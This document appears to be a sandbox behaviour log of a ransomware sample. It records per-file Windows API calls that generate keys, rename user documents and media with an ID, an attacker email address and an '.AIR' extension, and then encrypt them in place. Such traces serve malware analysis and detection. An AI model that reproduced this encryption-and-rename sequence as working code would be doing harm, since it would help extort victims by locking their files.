	[0105.881] GetProcessHeap () returned 0x540000
	[0105.881] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.881] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.883] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.884] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.884] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.885] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x18793, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x18793, lpOverlapped=0x0) returned 1
	[0105.887] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.887] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.887] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt", dwFileAttributes=0x80) returned 1
	[0105.888] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt") returned 56
	[0105.888] GetProcessHeap () returned 0x540000
	[0105.888] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd6) returned 0x601bd0
	[0105.888] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt"
	[0105.888] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.888] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\imrb_.odt"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\imrb_.odt.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.890] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Imrb_.odt.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\imrb_.odt.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.891] GetProcessHeap () returned 0x540000
	[0105.891] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0105.891] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=32217) returned 1
	[0105.891] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7dd9
	[0105.891] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.891] GetProcessHeap () returned 0x540000
	[0105.891] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.891] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.893] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.893] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.893] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.894] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x7dd9, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x7dd9, lpOverlapped=0x0) returned 1
	[0105.894] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.894] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.894] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv", dwFileAttributes=0x80) returned 1
	[0105.895] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv") returned 55
	[0105.895] GetProcessHeap () returned 0x540000
	[0105.895] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x601bd0
	[0105.895] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv"
	[0105.895] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.895] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hxi2.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hxi2.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.898] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HXi2.mkv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hxi2.mkv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.898] GetProcessHeap () returned 0x540000
	[0105.898] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0105.898] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=33188) returned 1
	[0105.898] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x81a4
	[0105.898] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.898] GetProcessHeap () returned 0x540000
	[0105.898] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.898] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.898] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.899] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.899] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.899] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x81a4, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x81a4, lpOverlapped=0x0) returned 1
	[0105.899] SetFilePointer (in: hFile=0x50c, lDistanceToMove=-33188, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0105.900] WriteFile (in: hFile=0x50c, lpBuffer=0x611d68*, nNumberOfBytesToWrite=0x81a4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x611d68*, lpNumberOfBytesWritten=0x3a1f778*=0x81a4, lpOverlapped=0x0) returned 1
	[0105.900] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.900] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.900] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi", dwFileAttributes=0x80) returned 1
	[0105.900] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi") returned 66
	[0105.900] GetProcessHeap () returned 0x540000
	[0105.900] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xea) returned 0x597dc8
	[0105.900] lstrcpyW (in: lpString1=0x597dc8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi"
	[0105.900] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.901] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gydr6vh2xt7gnqr.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gydr6vh2xt7gnqr.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.904] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gyDR6VH2xt7GNQr.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gydr6vh2xt7gnqr.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.904] GetProcessHeap () returned 0x540000
	[0105.904] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x597dc8 | out: hHeap=0x540000) returned 1
	[0105.904] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=14399) returned 1
	[0105.904] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x383f
	[0105.904] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.904] GetProcessHeap () returned 0x540000
	[0105.904] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.904] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.904] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.905] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.905] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.905] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x383f, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x383f, lpOverlapped=0x0) returned 1
	[0105.905] SetFilePointer (in: hFile=0x50c, lDistanceToMove=-14399, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0105.905] WriteFile (in: hFile=0x50c, lpBuffer=0x60d400*, nNumberOfBytesToWrite=0x383f, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x60d400*, lpNumberOfBytesWritten=0x3a1f778*=0x383f, lpOverlapped=0x0) returned 1
	[0105.906] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.906] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.906] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png", dwFileAttributes=0x80) returned 1
	[0105.906] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png") returned 60
	[0105.906] GetProcessHeap () returned 0x540000
	[0105.906] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xde) returned 0x603bd0
	[0105.906] lstrcpyW (in: lpString1=0x603bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png"
	[0105.906] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.906] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\g0imi6ivw.png"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\g0imi6ivw.png.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.909] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\g0Imi6iVW.png.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\g0imi6ivw.png.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.909] GetProcessHeap () returned 0x540000
	[0105.909] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x603bd0 | out: hHeap=0x540000) returned 1
	[0105.909] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=41664) returned 1
	[0105.909] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa2c0
	[0105.910] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.910] GetProcessHeap () returned 0x540000
	[0105.910] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.910] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.910] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.911] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.911] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.911] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0xa2c0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0xa2c0, lpOverlapped=0x0) returned 1
	[0105.912] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.912] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0105.912] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc", dwFileAttributes=0x80) returned 1
	[0105.913] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc") returned 55
	[0105.913] GetProcessHeap () returned 0x540000
	[0105.913] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd4) returned 0x601bd0
	[0105.913] lstrcpyW (in: lpString1=0x601bd0, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc"
	[0105.913] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc.12781717671972518758.ex_parvis@aol.com.AIR"
	[0105.913] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fteg.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fteg.doc.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0105.915] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fteg.doc.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\fteg.doc.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50c
	[0105.915] GetProcessHeap () returned 0x540000
	[0105.915] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x601bd0 | out: hHeap=0x540000) returned 1
	[0105.915] GetFileSizeEx (in: hFile=0x50c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=33736) returned 1
	[0105.915] SetFilePointer (in: hFile=0x50c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x83c8
	[0105.915] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0105.915] GetProcessHeap () returned 0x540000
	[0105.915] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0105.916] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0105.916] WriteFile (in: hFile=0x50c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0105.916] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0105.917] WriteFile (in: hFile=0x50c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0105.917] ReadFile (in: hFile=0x50c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x83c8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x83c8, lpOverlapped=0x0) returned 1
	[0105.917] SetFilePointer (in: hFile=0x50c, lDistanceToMove=-33736, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0105.917] WriteFile (in: hFile=0x50c, lpBuffer=0x611f88*, nNumberOfBytesToWrite=0x83c8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x611f88*, lpNumberOfBytesWritten=0x3a1f778*=0x83c8, lpOverlapped=0x0) returned 1
	[0105.917] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0105.917] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
